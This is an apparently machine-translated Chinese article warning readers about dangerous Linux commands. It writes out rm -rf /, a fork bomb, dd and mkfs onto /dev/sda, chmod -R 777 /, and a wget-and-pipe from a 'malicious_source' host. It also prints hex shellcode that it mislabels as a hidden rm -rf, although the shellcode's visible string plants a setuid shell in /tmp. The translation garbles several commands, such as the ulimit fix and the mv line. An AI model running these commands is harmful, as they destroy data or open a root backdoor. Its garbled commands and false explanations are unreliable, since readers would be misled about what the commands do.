最危险的命令 - 你永远不应该在 Linux 上运行它们

yanding 2023-07-20 221

命令行界面是管理 Linux 系统的强大而简单的工具。它提供了一种快速、灵活的方式来运行系统,特别是在管理没有图形界面的无头系统时。


虽然这些代码对于管理系统很有用,但它充满了风险。执行错误的命令可能会对您的计算机造成不可逆转的损坏。在本指南中,我们编译了一些您不应考虑在计算机上运行的最危险的命令。


1. rm -rf/命令

rm 命令是一个 Linux 命令,用于根据所使用的参数删除文件和文件夹。但是,在使用 rm 命令时必须格外小心,因为一个小的拼写错误或错误可能会导致不可恢复的系统损坏。


当使用该选项以 root 身份运行时,该命令将从Linux 文件层次结构配置中最高的-rf /根目录恢复系统上的所有文件和文件夹。(/)简而言之,rm -rf /该命令会完全擦除您的系统,从而导致系统损坏且无法恢复。


与 rm 命令一起使用的选项包括。



他们使用的词语

Linux 中的 rm 命令用于删除文件。

rm -r 命令会重复删除文件夹,甚至是空文件夹。

rm -f 命令删除“仅读取文件”而不提示。

rm -rf/:强制删除根目录中的所有内容。

rm -rf * :强制删除当前文件夹/工作目录中的所有内容。

rm -rf 的 . :单击删除现有文件夹和子文件夹。

事实上,如果您以普通用户身份运行该命令,您将在终端上收到两个警告。



要解决通过“rm”命令意外删除文件的问题,请在“\.bashrc”文件中将“rm”命令别名为“rm -i”,要求您确认任何删除操作。


2. :(){:|:&};:命令

上面其实就是叉子炸弹。它的工作原理是:创建一个名为 create 的函数,该函数调用自身两次,一次在前台,一次在后台。该进程重复执行,并在此过程中消耗所有系统资源,导致系统崩溃。


命令炸弹实际上是一种特定类型的 DoS(拒绝服务)攻击。也称为 Wabbit 或 Rabbit 病毒。最糟糕的是,您不必成为 root 即可发起此攻击。


值得庆幸的是,您可以通过将本地用户的操作限制为 4000 个用户来保护自己免受此攻击。


您可以通过运行以下命令来执行此操作:


$ 来自 -S -u

您可以稍后使用以下命令验证这一点:


$ ulimit -u


3.命令> /dev/sda

当您执行后跟 with 的命令时>/dev/sda,它将覆盖/dev/sda硬盘驱动器上的块。该块包含文件系统数据,覆盖时会导致无法恢复的系统损坏。


4.mv目录/dev/null

您不应尝试的另一个破坏性任务是打开/dev/null. /dev/null文件是一种特殊类型的文件,称为空设备或“黑洞”。被剑夺走的一切/dev/null都会被丢弃并摧毁。



以下命令将用户主目录的所有内容移动到/dev/null,从而转储用户主目录中的所有数据


# 等 /home/user/* /dev/null

5. wget http://malicious_source -O- | wget http://malicious_source -O- | 提供

wget 命令是从 Web 或文件服务器下载文件的命令。上述命令从恶意位置提取脚本然后执行。


6. mkfs.ext3 /dev/sda

mkfs 命令在随机存储设备(大多数情况下是硬盘驱动器的分区)上创建新的文件系统(ext2、ext3、ext4 等)。在分区上运行 mkfs 命令会删除其中存储的所有数据。


虽然在配置磁盘分区时很有用,但配置整个驱动器(例如 mkfs.ext3 /dev/sda)会导致系统崩溃并使其处于不可恢复的状态。发生这种情况是因为它破坏了附加到您的数据的所有系统文件。


该命令还可以采用其他形式,如下所示。


# mkfs.ext4 /dev/sda

# mkfs.xfs /dev/sda

# mkfs.btrfs /dev/sda

7. > 文件命令

>file 删除文件的内容并将其留空。它与 cat /dev/null > file 命令同义。因此,在 Linux 系统上执行新指令时应小心谨慎。


下面演示了该命令如何覆盖文本文件。您可以想象如果该命令包含的文件是配置文件,该命令将导致灾难。



8.^foo^bar

^foo^bar该代码既危险又有用,具体取决于它的实现方式。虽然它允许您编辑和重新执行以前执行的命令,但如果您在执行命令之前忽略对命令所做的更改,则可能会造成很大的破坏。


9. dd if =/dev/random of =/dev/sda

上述命令删除/dev/sda块并随机向该块写入坏数据。您的系统将处于不一致且不可恢复的状态。


10.Chmod -R 777/。

虽然它可能不会立即破坏您的 Linux 系统,但chmod -R 777 /该命令会从根目录恢复 Linux 系统上所有文件的所有权限(读取、写入和执行)。



这实际上向所有用户公开了所有重要的配置文件和其他文件,这给您的系统带来了严重的安全风险。任何怀有恶意的人都可以轻松修改重要文件并使您的系统崩溃。


11. 隐藏的命令

下面的命令只不过是上面的第一个命令(rm -rf)。这里的代码以十六进制隐藏,以欺骗毫无戒心的用户。如果您在终端中运行以下代码,它将删除您的根分区。


此命令表示威胁有时可能是隐藏的并且本质上不可见。你需要知道你在做什么以及结果会是什么。不要编译/执行来自未知来源的代码。


char esp[] __attribute__((section(“.text”))) /* esp

发布 */

=“\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68′′

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99′′

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7′′

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56′′

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31′′

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69′′

“\x6e\x2f\x73\x68\x00\x2d\x63\x00′′

“cp -p /bin/sh /tmp/.beyond; 修改4755

/tmp/.beyond;”;

注意:请勿在 Linux 终端或 shell 或朋友或学校计算机上运行上述任何命令。如果您想测试它们,请在虚拟机上使用它们。


由于执行上述命令而导致的任何不一致或数据丢失都将破坏您的订单,文章作者和 Tecmint 均不承担任何责任。


目前为止就这样了。我很快就会带着你们会喜欢阅读的另一篇有趣的文章回来。在那之前,请继续关注并连接到 Howtoing。


如果您知道任何其他此类危险 Linux 命令并希望我们将它们添加到列表中,请通过评论部分告诉我们,并且不要忘记分享您的关键字。

言鼎科技

The End